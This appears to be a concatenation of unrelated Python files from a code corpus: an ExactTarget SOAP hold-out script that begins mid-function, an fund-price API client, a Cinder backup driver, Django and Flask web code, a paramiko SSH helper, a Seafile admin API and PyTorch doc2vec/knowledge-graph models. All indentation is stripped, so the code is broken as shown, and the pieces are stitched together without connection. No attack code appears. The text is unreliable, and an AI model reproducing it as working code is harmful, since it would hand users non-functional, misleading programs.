<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
<s:Header>
<a:Action s:mustUnderstand="1">Retrieve</a:Action>
<a:To s:mustUnderstand="1">https://webservice.s6.exacttarget.com/Service.asmx</a:To>
<fueloauth xmlns="http://exacttarget.com">{accessToken}</fueloauth>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<RetrieveRequestMsg xmlns="http://exacttarget.com/wsdl/partnerAPI">
<RetrieveRequest>
<ObjectType>DataExtensionObject[{de_name}]</ObjectType>
<Properties>NAME</Properties>
<Properties>Flag</Properties>
<Properties>Status</Properties>
<Filter xsi:type="SimpleFilterPart">
<Property>Status</Property>
<SimpleOperator>equals</SimpleOperator>
<Value>Unprocessed</Value>
</Filter>
</RetrieveRequest>
</RetrieveRequestMsg>
</s:Body>
</s:Envelope>
"""
url = "https://webservice.s6.exacttarget.com/Service.asmx"
headers = {'content-type': 'text/xml'}
body = descbody
resp = requests.post(url, data=body, headers=headers)
response = resp.text
# print(response)
data = jxmlease.parse(response)
status1=data["soap:Envelope"]["soap:Body"]["RetrieveResponseMsg"]["Results"]
status2 = loads(dumps(status1))
except Exception as e:
return "There are no records for holding out...",e
else:
cust_list=[]
# print(status2)
for item in status2:
cust_key= item["Properties"]["Property"][0]['Value']
cust_list.append(cust_key)
print("UnProcessed List",cust_list)
n= len(cust_list)%10
print(n)
cust_1 = []
for i in range(0,n):
cust_1.append(cust_list.pop())
print(cust_1)
cust_2 = [ele for ele in cust_list if ele not in cust_1]
print(cust_2)
if len(cust_2) > 9:
# hold_list = cust_list[::10]
hold_list = [cust_2[x*10-1] for x in range(1,len(cust_2)) if x*10<=len(cust_2)]
print(hold_list)
for element in hold_list:
soapbody = f"""
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
<s:Header>
<a:Action s:mustUnderstand="1">Update</a:Action>
<a:MessageID>urn:uuid:7e0cca04-57bd-4481-864c-6ea8039d2ea0</a:MessageID>
<a:ReplyTo>
<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:To s:mustUnderstand="1">https://webservice.s6.exacttarget.com/Service.asmx</a:To>
<fueloauth xmlms="http://exacttarget.com">{accessToken}</fueloauth>
</s:Header>
<s:Body
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<UpdateRequest
xmlns="http://exacttarget.com/wsdl/partnerAPI">
<Objects xsi:type="DataExtensionObject">
<PartnerKey xsi:nil="true"/>
<Client>
<ID>{account_id}</ID>
</Client>
<ObjectID xsi:nil="true"/>
<CustomerKey>{de_external_key}</CustomerKey>
<Properties>
<Property>
<Name>Name</Name>
<Value>{element}</Value>
</Property>
<Property>
<Name>Flag</Name>
<Value>False</Value>
</Property>
<Property>
<Name>Status</Name>
<Value>Hold Out</Value>
</Property>
</Properties>
</Objects>
</UpdateRequest>
</s:Body>
</s:Envelope>
"""
url = "https://webservice.s6.exacttarget.com/Service.asmx"
headers = {'content-type': 'text/xml'}
body = soapbody
resp = requests.post(url, data=body, headers=headers)
print(resp.status_code)
# print(resp.text)
holdout_rec = hold_list
# print("HoldOut Records: ", holdout_rec)
res_list = tuple(set(holdout_rec)^set(cust_2))
print("Without Holdout: ", res_list)
for element in res_list:
soapbody = f"""
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
<s:Header>
<a:Action s:mustUnderstand="1">Update</a:Action>
<a:MessageID>urn:uuid:7e0cca04-57bd-4481-864c-6ea8039d2ea0</a:MessageID>
<a:ReplyTo>
<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:To s:mustUnderstand="1">https://webservice.s6.exacttarget.com/Service.asmx</a:To>
<fueloauth xmlms="http://exacttarget.com">{accessToken}</fueloauth>
</s:Header>
<s:Body
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<UpdateRequest
xmlns="http://exacttarget.com/wsdl/partnerAPI">
<Objects xsi:type="DataExtensionObject">
<PartnerKey xsi:nil="true"/>
<Client>
<ID>{account_id}</ID>
</Client>
<ObjectID xsi:nil="true"/>
<CustomerKey>{de_external_key}</CustomerKey>
<Properties>
<Property>
<Name>Name</Name>
<Value>{element}</Value>
</Property>
<Property>
<Name>Flag</Name>
<Value>True</Value>
</Property>
<Property>
<Name>Status</Name>
<Value>Processed</Value>
</Property>
</Properties>
</Objects>
</UpdateRequest>
</s:Body>
</s:Envelope>
"""
url = "https://webservice.s6.exacttarget.com/Service.asmx"
headers = {'content-type': 'text/xml'}
body = soapbody
resp = requests.post(url, data=body, headers=headers)
print(resp.status_code)
# print(resp.text)
if len(cust_1) > 0:
for element in cust_1:
soapbody = f"""
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
<s:Header>
<a:Action s:mustUnderstand="1">Update</a:Action>
<a:MessageID>urn:uuid:7e0cca04-57bd-4481-864c-6ea8039d2ea0</a:MessageID>
<a:ReplyTo>
<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:To s:mustUnderstand="1">https://webservice.s6.exacttarget.com/Service.asmx</a:To>
<fueloauth xmlms="http://exacttarget.com">{accessToken}</fueloauth>
</s:Header>
<s:Body
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<UpdateRequest
xmlns="http://exacttarget.com/wsdl/partnerAPI">
<Objects xsi:type="DataExtensionObject">
<PartnerKey xsi:nil="true"/>
<Client>
<ID>{account_id}</ID>
</Client>
<ObjectID xsi:nil="true"/>
<CustomerKey>{de_external_key}</CustomerKey>
<Properties>
<Property>
<Name>Name</Name>
<Value>{element}</Value>
</Property>
<Property>
<Name>Flag</Name>
<Value>True</Value>
</Property>
<Property>
<Name>Status</Name>
<Value>Unprocessed</Value>
</Property>
</Properties>
</Objects>
</UpdateRequest>
</s:Body>
</s:Envelope>
"""
url = "https://webservice.s6.exacttarget.com/Service.asmx"
headers = {'content-type': 'text/xml'}
body = soapbody
resp = requests.post(url, data=body, headers=headers)
print(resp.status_code)
# print(resp.text)
return "All Records Processed Sucessfully..."
dataextension2() | 1.523438 | 2 |
function/python/brightics/function/textanalytics/__init__.py | GSByeon/studio | 0 | 12797912 | <gh_stars>0
from .ngram import ngram
from .lda import lda
from .tfidf import tfidf
| 0.539063 | 1 |
utils.py | quanhua92/vietnam_investment_fund | 0 | 12797920 | <gh_stars>0
import requests
import json
from datetime import datetime
def get_all_products():
url = "https://api.fmarket.vn/res/products/filter"
data = {"types":["NEW_FUND","TRADING_FUND"],"issuerIds":[],"page":1,"pageSize":1000,"fundAssetTypes":[],"bondRemainPeriods":[],"searchField":""}
headers = {"Content-Type": "application/json; charset=utf-8"}
x = requests.post(url, json=data, headers=headers)
return json.loads(x.text)
def get_history(product_id):
url = "https://api.fmarket.vn/res/product/get-nav-history"
toDate = datetime.now().strftime("%Y%m%d")
data = {"isAllData":1,"productId":product_id,"fromDate": None, "toDate": toDate}
headers = {"Content-Type": "application/json; charset=utf-8"}
x = requests.post(url, json=data, headers=headers)
return json.loads(x.text) | 1.265625 | 1 |
Project 8/DeskNotification.py | ingwant/Python-Programs | 0 | 12797928 | <filename>Project 8/DeskNotification.py
# pip install plyer
from plyer import notification
def send_desk_message(title, message):
notification.notify(
title=title,
message=message,
app_icon="circle-48.ico",
timeout=5
)
send_desk_message("TITLE", "This is a message....")
| 1.109375 | 1 |
cinder/backup/drivers/sheepdog.py | AO-AO/cmss-cinder | 0 | 12797936 | <gh_stars>0
#coding:utf-8
import time
import json
import urllib2
from oslo.config import cfg
from cinder import exception
from oslo_log import log as logging
from cinder.backup.driver import BackupDriver
LOG = logging.getLogger(__name__)
service_opts = [
cfg.StrOpt('cinder_ip',
default='172.16.172.250:8776',
help='ebs management node ip.'),
]
CONF = cfg.CONF
CONF.register_opts(service_opts)
class SheepdogBackupDriver(BackupDriver):
def __init__(self, context, db_driver=None):
super(SheepdogBackupDriver, self).__init__(db_driver)
self.context = context
self._server_ip = self._utf8(CONF.cinder_ip)
@staticmethod
def _utf8(s):
"""Ensure string s is utf8 (i.e. not unicode)."""
if isinstance(s, str):
return s
return s.encode('utf8')
def backup(self, backup, volume_file):
LOG.info('Starting backup...... Creating a new backup for volume:%s.' % backup['volume_id'])
backup_id = backup['id']
url = 'http://' + self._server_ip + '/v2/admin/backups'
data = {
"backup":{
"container" : backup['container'],
"description": backup['display_description'],
"name" : backup['display_name'],
"volume_id" : backup['volume_id'],
"backupid" : backup_id
}
}
jdata = json.dumps(data)
req = urllib2.Request(url, jdata)
req.add_header('Content-type', 'application/json')
try:
response = urllib2.urlopen(req)
LOG.debug(response.read())
except urllib2.HTTPError, e:
LOG.debug(e.code)
msg = "redirect backup cmd failed!"
raise exception.BackupOperationError(msg)
while True:
url = 'http://' + self._server_ip + '/v2/admin/backups/' + backup_id
try:
response = urllib2.urlopen(url)
ret = response.read()
LOG.debug("RET: %r" % ret)
data = json.loads(ret)
except urllib2.HTTPError, e:
LOG.debug(e.code)
msg = "confirm backup cmd failed!"
raise exception.BackupOperationError(msg)
if data['backup']['status'] == 'available':
size = data['backup']['object_count']
LOG.debug("size %s MB." % size)
LOG.info('backup finished.')
break
time.sleep(3)
return size
def restore(self, backup, target_volume_id, volume_file):
LOG.info('Starting restore...... restore from src_volume:%(src)s to dst_volume:%(dst)s' %
{'src': backup['volume_id'], 'dst': str("volume-" + target_volume_id)})
backup_id = backup['id']
url = 'http://' + self._server_ip + '/v2/admin/backups/' + backup_id + '/restore'
data = {
"restore":{
"volume_id": target_volume_id
}
}
jdata = json.dumps(data)
req = urllib2.Request(url, jdata)
req.add_header('Content-type', 'application/json')
try:
response = urllib2.urlopen(req)
LOG.debug(response.read())
except urllib2.HTTPError, e:
LOG.debug(e.code)
msg = "redirect restore cmd failed!"
raise exception.BackupOperationError(msg)
while True:
url = 'http://' + self._server_ip + '/v2/admin/backups/' + backup_id
try:
response = urllib2.urlopen(url)
ret = response.read()
LOG.debug("RET: %r" % ret)
data = json.loads(ret)
except urllib2.HTTPError, e:
LOG.debug(e.code)
msg = "confirm restore cmd failed!"
raise exception.BackupOperationError(msg)
if data['backup']['status'] == 'available':
LOG.info('restore finished.')
break
time.sleep(3)
def delete(self, backup):
LOG.info('Starting delete...... backupid:%s' % backup['id'])
backup_id = backup['id']
url = 'http://' + self._server_ip + '/v2/admin/backups/' + backup_id
req = urllib2.Request(url)
req.add_header('Content-Type', 'application/json')
req.get_method = lambda:'DELETE'
try:
response = urllib2.urlopen(req)
LOG.debug(response.read())
except urllib2.HTTPError, e:
LOG.debug(e.code)
if e.code == 404:
msg = "backup does not exist!"
LOG.info(msg)
raise exception.BackupOperationError(msg)
#help to decide the volume whether belongs to ebs
else:
msg = "redirect delete cmd failed!"
raise exception.BackupOperationError(msg)
while True:
url = 'http://' + self._server_ip + '/v2/admin/backups/' + backup_id
try:
urllib2.urlopen(url)
except urllib2.HTTPError, e:
LOG.debug(e.code)
if e.code == 404:
"""backup does not exist! already success!"""
LOG.info('delete finished.')
break
else:
msg = "confirm delete cmd failed!"
raise exception.BackupOperationError(msg)
time.sleep(3)
def get_backup_driver(context):
return SheepdogBackupDriver(context)
if __name__ == '__main__':
driver = SheepdogBackupDriver()
| 1.351563 | 1 |
reading/book/migrations/0003_auto_20180613_1926.py | Family-TreeSY/reading | 2 | 12797944 | <reponame>Family-TreeSY/reading<gh_stars>1-10
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-06-13 11:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('book', '0002_auto_20180613_1914'),
]
operations = [
migrations.AlterField(
model_name='story',
name='image',
field=models.ImageField(blank=True, upload_to=b'', verbose_name='\u56fe\u7247'),
),
]
| 1.039063 | 1 |
api/states/apiviews.py | Mastersam07/ncovid-19-api | 17 | 12797952 | <reponame>Mastersam07/ncovid-19-api<gh_stars>10-100
from rest_framework import generics, viewsets
from rest_framework.generics import get_object_or_404
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Data
from .serializers import StateSerializer # CaseSerializer
class StateList(APIView):
@staticmethod
def get(request):
states = Data.objects.all()
data = StateSerializer(states, many=True).data
return Response(data)
class StateDetail(APIView):
@staticmethod
def get(request, id):
state = get_object_or_404(Data, pk=id)
data = StateSerializer(state).data
return Response(data)
class StateViewSet(viewsets.ModelViewSet):
queryset = Data.objects.all()
serializer_class = StateSerializer
| 1.367188 | 1 |
app.py | manojvirat457/Resume-Matching | 0 | 12797960 | # from scripts import tabledef
# from scripts import forms
# from scripts import helpers
from flask import Flask, redirect, url_for, render_template, request, session
import json
import sys
import os
# import stripe
import pandas as pd
from werkzeug.utils import secure_filename
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import Ridge
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.feature_extraction.text import CountVectorizer
from tkinter import Tk
from tkinter.filedialog import askopenfilename
import numpy as np
import pandas as pd
import jieba
import jieba.analyse
import csv
import ast
import sys
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import XMLConverter, HTMLConverter, TextConverter
from pdfminer.layout import LAParams
import io
app = Flask(__name__)
# app.secret_key = os.urandom(12) # Generic key for dev purposes only
# stripe_keys = {
# 'secret_key': os.environ['secret_key'],
# 'publishable_key': os.environ['publishable_key']
# }
# stripe.api_key = stripe_keys['secret_key']
# Heroku
#from flask_heroku import Heroku
#heroku = Heroku(app)
# ======== Routing =========================================================== #
# -------- Login ------------------------------------------------------------- #
@app.route('/', methods=['GET', 'POST'])
def login():
# creating a pdf file object
basepath = os.path.dirname(__file__)
file_path = os.path.join(basepath, 'uploads', 'sample.pdf')
fp = open(file_path, 'rb')
rsrcmgr = PDFResourceManager()
retstr = io.StringIO()
laparams = LAParams()
device = TextConverter(rsrcmgr, retstr, laparams=laparams)
# Create a PDF interpreter object.
interpreter = PDFPageInterpreter(rsrcmgr, device)
# Process each page contained in the document.
for page in PDFPage.get_pages(fp):
interpreter.process_page(page)
data = retstr.getvalue()
print(data)
return render_template('home.html', user="manoj")
# return text
def getFile():
Tk().withdraw()
filename = askopenfilename()
Tk.close()
return filename
@app.route("/logout")
def logout():
session['logged_in'] = False
return redirect(url_for('login'))
@app.route('/predict', methods=['GET', 'POST'])
def upload():
if request.method == 'GET':
# f = request.files['file']
basepath = os.path.dirname(__file__)
# file_path = os.path.join(
# basepath, 'uploads', secure_filename(f.filename))
# f.save(file_path)
file_path = os.path.join(basepath, 'uploads', 'test-upload.csv')
df = pd.read_csv(file_path)
seg_list01 = df['job-description']
seg_list02 = df['your-resume']
item01_list = seg_list01
item01 = ','.join(item01_list)
item02_list = seg_list02
item02 = ','.join(item02_list)
documents = [item01, item02]
count_vectorizer = CountVectorizer()
sparse_matrix = count_vectorizer.fit_transform(documents)
doc_term_matrix = sparse_matrix.todense()
df = pd.DataFrame(doc_term_matrix,
columns=count_vectorizer.get_feature_names(),
index=['item01', 'item02'])
df.to_csv(os.path.join(basepath, 'uploads', 'result.csv'))
read_file = pd.read_csv(os.path.join(basepath, 'uploads',
'result.csv'))
read_file.to_excel(os.path.join(basepath, 'uploads', 'result.xlsx'),
index=None,
header=True)
answer = cosine_similarity(df, df)
print("CSV Created Successfully")
answer = pd.DataFrame(answer)
answer = answer.iloc[[1], [0]].values[0]
answer = round(float(answer), 4) * 100
return "Your resume matched " + str(
answer) + " %" + " of the job-description!"
return None
# ======== Main ============================================================== #
if __name__ == "__main__":
app.run(debug=True, use_reloader=True) | 1.664063 | 2 |
common/code/snippets/txt/ssh.py | nevesnunes/env | 4 | 12797968 | <filename>common/code/snippets/txt/ssh.py
import paramiko
import datetime
import subprocess # run it locally if you want, use this for Bash commands
def run_netflow_cmd(command):
rwflow_server_ip = "192.168.3.11" # SiLK box
user_name="netflow"
keyfile="/home/marius/.ssh/id_rsa"
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(rwflow_server_ip, username=user_name, key_filename=keyfile)
stdin, stdout, stderr = ssh.exec_command(command + "&& echo 'done'")
for line in stderr.readlines():
print line
for line in stdout.readlines():
# print line
exit_status = stdout.channel.recv_exit_status() # Blocking call
if exit_status == 0:
print str(datetime.datetime.today()) + ": Command finished successfully."
else:
print("Error", exit_status)
ssh.close()
| 1.703125 | 2 |
seahub/organizations/api/users.py | samuelduann/seahub | 420 | 12797976 | # Copyright (c) 2012-2016 Seafile Ltd.
import logging
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.authentication import SessionAuthentication
from seaserv import ccnet_api
from seahub.api2.permissions import IsProVersion
from seahub.api2.throttling import UserRateThrottle
from seahub.api2.authentication import TokenAuthentication
from seahub.api2.utils import api_error
from seahub.api2.endpoints.utils import is_org_user
from seahub.utils import is_valid_email
from seahub.base.accounts import User
from seahub.base.templatetags.seahub_tags import email2nickname
from seahub.profile.models import Profile
logger = logging.getLogger(__name__)
def get_user_info(email):
profile = Profile.objects.get_profile_by_user(email)
info = {}
info['email'] = email
info['name'] = email2nickname(email)
info['contact_email'] = profile.contact_email if profile and profile.contact_email else ''
return info
class OrgAdminUser(APIView):
authentication_classes = (TokenAuthentication, SessionAuthentication)
throttle_classes = (UserRateThrottle,)
permission_classes = (IsProVersion,)
def put(self, request, org_id, email):
""" update name of an org user.
Permission checking:
1. only admin can perform this action.
"""
# resource check
org_id = int(org_id)
if not ccnet_api.get_org_by_id(org_id):
error_msg = 'Organization %s not found.' % org_id
return api_error(status.HTTP_404_NOT_FOUND, error_msg)
try:
user = User.objects.get(email=email)
except User.DoesNotExist:
error_msg = 'User %s not found.' % email
return api_error(status.HTTP_404_NOT_FOUND, error_msg)
# permission check
if not request.user.org.is_staff:
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
if request.user.org.org_id != org_id:
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
if not is_org_user(email, org_id):
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
# update user's name
name = request.data.get("name", None)
if name is not None:
name = name.strip()
if len(name) > 64:
error_msg = 'Name is too long (maximum is 64 characters).'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
if "/" in name:
error_msg = "Name should not include '/'."
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
Profile.objects.add_or_update(email, nickname=name)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
# update user's contact email
contact_email = request.data.get("contact_email", None)
if contact_email is not None:
contact_email = contact_email.strip()
if contact_email != '' and not is_valid_email(contact_email):
error_msg = 'contact_email invalid.'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
Profile.objects.add_or_update(email, contact_email=contact_email)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
info = get_user_info(email)
info['is_active'] = user.is_active
return Response(info)
| 1.28125 | 1 |
models.py | DSRnD/UMLs | 0 | 12797984 | <reponame>DSRnD/UMLs
import torch
import torch.nn as nn
import torch.nn.functional as F
import random
import numpy as np
import torch.autograd as autograd
class NegativeSampling(nn.Module):
"""Negative sampling loss as proposed by <NAME> al. in Distributed
Representations of Words and Phrases and their Compositionality.
"""
def __init__(self):
super(NegativeSampling, self).__init__()
self._log_sigmoid = nn.LogSigmoid()
def forward(self, scores):
"""Computes the value of the loss function.
Parameters
----------
scores: autograd.Variable of size (batch_size, num_noise_words + 1)
Sparse unnormalized log probabilities. The first element in each
row is the ground truth score (i.e. the target), other elements
are scores of samples from the noise distribution.
"""
try:
k = scores.size()[1] - 1
return -torch.sum(
self._log_sigmoid(scores[:, 0])
+ torch.sum(self._log_sigmoid(-scores[:, 1:]), dim=1) / k
) / scores.size()[0]
except:
k = 1
return -torch.sum(torch.sum(self._log_sigmoid(scores)))
class marginLoss(nn.Module):
def __init__(self):
super(marginLoss, self).__init__()
def forward(self, pos, neg, margin):
val = pos - neg + margin
return torch.sum(torch.max(val, torch.zeros_like(val)))
def projection_transH(original, norm):
return original - torch.sum(original * norm, dim=1, keepdim=True) * norm
def projection_DistMult(original, norm1, norm2):
return torch.sum(original * norm1, dim=1, keepdim=True) * norm2
def projection_transD(original, norm):
return original + torch.sum(original * norm, dim=1, keepdim=True) * norm
class Link_Model(nn.Module):
"""Link prediction model"""
def __init__(self, kg_model):
self.vec_dim = vec_dinm
self.out_dim = out_dim
self.kg_model = kg_model
#self.linear1 = nn.Linear(self.vec_dim, self.out_dim)
self.linear = nn.Linear(1, 1, bias=True, requires_grad=True)
def forward(self, hi, ti, ri):
with torch.no_grad():
_, _, _, _, pos, _ = self.kg_model(_, _, _, hi, ti, ri, _)
out = self.linear(pos)
return out
class D2V_KG(nn.Module):
"""Doc2vec model with transh loss
"""
def __init__(self, vec_dim, num_docs, num_words, n_rel, d2v_model_ver, kg_model_ver, margin, delta):
super(D2V_KG, self).__init__()
self.num_docs = num_docs
self.margin = margin
self.delta = delta
self.kg_model_ver = kg_model_ver
self.d2v_model_ver = d2v_model_ver
if d2v_model_ver == 'dm':
self.d2v = DM(vec_dim, num_docs, num_words)
else:
self.d2v = DBOW(vec_dim, num_docs, num_words)
self.cost_func = NegativeSampling()
self.kg_loss_fn = marginLoss()
self.W_R = nn.Parameter(
torch.randn(n_rel, vec_dim), requires_grad=True)
self.D_R = nn.Parameter(
torch.randn(n_rel, vec_dim), requires_grad=True)
self.M_R = nn.Parameter(
torch.randn(n_rel, vec_dim, vec_dim), requires_grad=True)
normalize_entity_emb = F.normalize(self.d2v._D.data, p=2, dim=1)
normalize_relation_emb = F.normalize(self.W_R.data, p=2, dim=1)
normalize_norm_emb = F.normalize(self.D_R.data, p=2, dim=1)
self.d2v._D.data = normalize_entity_emb
self.W_R.data = normalize_relation_emb
self.D_R.data = normalize_norm_emb
def forward(self, context_ids, doc_ids, target_noise_ids, hi, ti, ri, tj):
"""Sparse computation of scores (unnormalized log probabilities)
that should be passed to the negative sampling loss.
Parameters
----------
context_ids: torch.Tensor of size (batch_size, num_context_words)
Vocabulary indices of context words.
doc_ids: torch.Tensor of size (batch_size,)
Document indices of paragraphs.
target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
Vocabulary indices of target and noise words. The first element in
each row is the ground truth index (i.e. the target), other
elements are indices of samples from the noise distribution.
hi: torch.Tensor of size (batch_size,)
Heads from golden triplets from relational graph
ti: torch.Tensor of size (batch_size,)
Tails from golden triplets from relational graph
ri: torch.Tensor of size (batch_size,)
Relations from golden triplets from relational graph
tj: torch.Tensor of size (batch_size,)
Tails from noisy triplets from relational graph
Returns
-------
autograd.Variable of size (batch_size, num_noise_words + 1)
"""
hi_emb = self.d2v._D[hi,:]
ti_emb = self.d2v._D[ti,:]
w_ri_emb = self.W_R[ri,:]
d_ri_emb = self.D_R[ri,:]
#tj = random.sample(np.arange(0,self.num_docs).tolist(), hi_emb.shape[0])
#if torch.cuda.is_available():
# tj = torch.LongTensor(np.asarray(tj)).to(torch.device('cuda'))
tj_emb = self.d2v._D[tj,:]
pos = None
neg = None
if self.kg_model_ver == 'transh':
pos_h_e = projection_transH(hi_emb, d_ri_emb)
pos_t_e = projection_transH(ti_emb, d_ri_emb)
neg_h_e = projection_transH(hi_emb, d_ri_emb)
neg_t_e = projection_transH(tj_emb, d_ri_emb)
pos = torch.sum((pos_h_e + w_ri_emb - pos_t_e) ** 2, 1)
neg = torch.sum((neg_h_e + w_ri_emb - neg_t_e) ** 2, 1)
elif self.kg_model_ver == 'transe':
pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
elif self.kg_model_ver == 'distmult':
pos = torch.sum(projection_DistMult(w_ri_emb, hi_emb, ti_emb), 1)
neg = torch.sum(projection_DistMult(w_ri_emb, hi_emb, tj_emb), 1)
elif self.kg_model_ver == 'transr':
M_R = self.M_R[ri,:]
hi_emb = torch.einsum('ij, ijk -> ik', hi_emb, M_R)
ti_emb = torch.einsum('ij, ijk -> ik', ti_emb, M_R)
tj_emb = torch.einsum('ij, ijk -> ik', tj_emb, M_R)
hi_emb = F.normalize(hi_emb, p=2, dim=1)
ti_emb = F.normalize(ti_emb, p=2, dim=1)
tj_emb = F.normalize(tj_emb, p=2, dim=1)
pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
elif self.kg_model_ver == 'transd':
hi_emb = projection_transD(hi_emb, w_ri_emb)
ti_emb = projection_transD(ti_emb, w_ri_emb)
tj_emb = projection_transD(tj_emb, w_ri_emb)
pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
if self.d2v_model_ver != 'none':
d2v_output = self.d2v.forward(context_ids, doc_ids, target_noise_ids)
d2v_loss = self.cost_func.forward(d2v_output)
else:
d2v_output = torch.FloatTensor([0])
d2v_loss = torch.FloatTensor([0])
if self.kg_model_ver != 'none':
#print (pos.shape, neg.shape)
kg_loss = self.kg_loss_fn(pos, neg, self.margin)
else:
kg_loss = torch.FloatTensor([0])
if self.d2v_model_ver != 'none' and self.kg_model_ver != 'none':
total_loss = (1-self.delta)*d2v_loss + self.delta*kg_loss
elif self.d2v_model_ver != 'none':
total_loss = d2v_loss
elif self.kg_model_ver != 'none':
total_loss = kg_loss
else:
raise ValueError("Both D2V and KG model can not be none")
return total_loss, d2v_loss, kg_loss, d2v_output, pos, neg
def get_paragraph_vector(self, index):
return self.d2v._D[index, :].data.tolist()
class DM(nn.Module):
"""Distributed Memory version of Paragraph Vectors.
Parameters
----------
vec_dim: int
Dimensionality of vectors to be learned (for paragraphs and words).
num_docs: int
Number of documents in a dataset.
num_words: int
Number of distinct words in a daset (i.e. vocabulary size).
"""
def __init__(self, vec_dim, num_docs, num_words):
super(DM, self).__init__()
# paragraph matrix
self._D = nn.Parameter(
torch.randn(num_docs, vec_dim), requires_grad=True)
# word matrix
self._W = nn.Parameter(
torch.randn(num_words, vec_dim), requires_grad=True)
# output layer parameters
self._O = nn.Parameter(
torch.FloatTensor(vec_dim, num_words).zero_(), requires_grad=True)
def forward(self, context_ids, doc_ids, target_noise_ids):
"""Sparse computation of scores (unnormalized log probabilities)
that should be passed to the negative sampling loss.
Parameters
----------
context_ids: torch.Tensor of size (batch_size, num_context_words)
Vocabulary indices of context words.
doc_ids: torch.Tensor of size (batch_size,)
Document indices of paragraphs.
target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
Vocabulary indices of target and noise words. The first element in
each row is the ground truth index (i.e. the target), other
elements are indices of samples from the noise distribution.
Returns
-------
autograd.Variable of size (batch_size, num_noise_words + 1)
"""
# combine a paragraph vector with word vectors of
# input (context) words
x = torch.add(
self._D[doc_ids, :], torch.sum(self._W[context_ids, :], dim=1))
# sparse computation of scores (unnormalized log probabilities)
# for negative sampling
return torch.bmm(
x.unsqueeze(1),
self._O[:, target_noise_ids].permute(1, 0, 2)).squeeze()
def get_paragraph_vector(self, index):
return self._D[index, :].data.tolist()
class DBOW(nn.Module):
"""Distributed Bag of Words version of Paragraph Vectors.
Parameters
----------
vec_dim: int
Dimensionality of vectors to be learned (for paragraphs and words).
num_docs: int
Number of documents in a dataset.
num_words: int
Number of distinct words in a daset (i.e. vocabulary size).
"""
def __init__(self, vec_dim, num_docs, num_words):
super(DBOW, self).__init__()
# paragraph matrix
self._D = nn.Parameter(
torch.randn(num_docs, vec_dim), requires_grad=True)
# output layer parameters
self._O = nn.Parameter(
torch.FloatTensor(vec_dim, num_words).zero_(), requires_grad=True)
def forward(self, context_ids, doc_ids, target_noise_ids):
"""Sparse computation of scores (unnormalized log probabilities)
that should be passed to the negative sampling loss.
Parameters
----------
doc_ids: torch.Tensor of size (batch_size,)
Document indices of paragraphs.
target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
Vocabulary indices of target and noise words. The first element in
each row is the ground truth index (i.e. the target), other
elements are indices of samples from the noise distribution.
Returns
-------
autograd.Variable of size (batch_size, num_noise_words + 1)
"""
# sparse computation of scores (unnormalized log probabilities)
# for negative sampling
return torch.bmm(
self._D[doc_ids, :].unsqueeze(1),
self._O[:, target_noise_ids].permute(1, 0, 2)).squeeze()
def get_paragraph_vector(self, index):
return self._D[index, :].data.tolist()
